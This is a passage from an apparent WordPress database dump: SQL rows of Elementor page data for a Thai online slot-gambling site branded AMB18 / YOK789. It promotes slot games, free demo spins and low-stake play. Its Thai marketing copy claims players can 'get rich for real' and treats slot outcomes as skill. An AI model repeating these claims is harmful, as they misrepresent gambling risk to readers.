\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2804,383,'_thumbnail_id','371'),(2805,383,'_elementor_edit_mode','builder'),(2806,383,'_elementor_template_type','wp-page'),(2807,383,'_elementor_version','3.35.5'),(2808,383,'_elementor_pro_version','3.32.3'),(2809,383,'_wp_page_template','default'),(2810,383,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2811,383,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> 